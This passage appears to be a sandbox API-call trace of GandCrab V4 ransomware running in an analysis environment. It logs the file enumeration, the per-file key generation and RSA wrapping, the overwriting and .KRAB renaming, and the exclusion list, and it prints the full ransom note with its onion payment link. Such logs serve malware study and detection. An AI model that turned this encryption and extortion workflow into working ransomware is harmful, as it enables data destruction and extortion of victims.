flProtect=0x40) returned 0x3030000 [0094.441] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.441] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.441] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0094.441] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0094.441] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.442] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010f08) returned 1 [0094.442] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0094.442] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.442] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.443] GetLastError () returned 0x0 [0094.443] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.443] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0094.443] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0094.443] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0094.443] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.443] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.444] GetLastError () returned 0x0 [0094.444] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.444] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.444] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\plmbicm9j-.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.444] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.445] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.445] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x84d5, lpOverlapped=0x0) returned 1 [0094.460] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff7b2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.460] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x84d5, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x84d5, lpOverlapped=0x0) returned 1 [0094.460] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0094.460] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.465] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.465] CloseHandle (hObject=0x778) returned 1 [0094.465] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.466] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\plmbicm9j-.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\plmbicm9j-.mp3.krab")) returned 1 [0094.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.467] lstrcmpW (lpString1="pSj_", lpString2=".") returned 1 [0094.467] lstrcmpW (lpString1="pSj_", lpString2="..") returned 1 [0094.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="pSj_" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_" [0094.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\" [0094.467] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.468] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.468] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.468] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\\\KRAB-DECRYPT.txt") returned 71 [0094.468] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.469] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.469] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.470] CloseHandle (hObject=0x778) returned 1 [0094.470] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.470] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.470] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x29c)) [0094.471] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.471] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.471] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.471] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock") returned 77 [0094.471] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0094.472] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.472] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.472] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\") returned 54 [0094.472] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\*" [0094.472] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd7a0 [0094.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.473] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.473] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.473] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.473] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.473] lstrcmpW (lpString1="7jxojVIzKi.m4a", lpString2=".") returned 1 [0094.473] lstrcmpW (lpString1="7jxojVIzKi.m4a", lpString2="..") returned 1 [0094.473] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="7jxojVIzKi.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a" [0094.473] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.474] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a.KRAB") returned 73 [0094.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a") returned 68 [0094.474] lstrlenW (lpString=".m4a") returned 4 [0094.474] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.475] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0094.475] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a") returned 68 [0094.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a") returned 68 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="desktop.ini") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="autorun.inf") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="ntuser.dat") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="iconcache.db") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="bootsect.bak") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="boot.ini") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="ntuser.dat.log") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="thumbs.db") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.475] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="ntldr") returned -1 [0094.476] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="NTDETECT.COM") returned -1 [0094.476] lstrcmpiW (lpString1="7jxojVIzKi.m4a", lpString2="Bootfont.bin") returned -1 [0094.476] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.476] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011238) returned 1 [0094.476] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.477] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.477] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.477] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.477] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0094.477] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.478] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0094.478] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.478] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.479] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.479] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.479] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0094.479] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.479] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10111b0) returned 1 [0094.480] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.480] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.480] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.480] GetLastError () returned 0x0 [0094.480] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.480] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.480] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.481] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.481] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.481] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.481] GetLastError () returned 0x0 [0094.481] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.481] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.481] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\7jxojvizki.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.482] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.482] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.483] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x153e5, lpOverlapped=0x0) returned 1 [0094.504] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffeac1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.504] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x153e5, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x153e5, lpOverlapped=0x0) returned 1 [0094.504] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.504] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.508] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.509] CloseHandle (hObject=0x43c) returned 1 [0094.509] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.510] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\7jxojvizki.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\7jxojVIzKi.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\7jxojvizki.m4a.krab")) returned 1 [0094.511] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.511] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.511] lstrcmpW 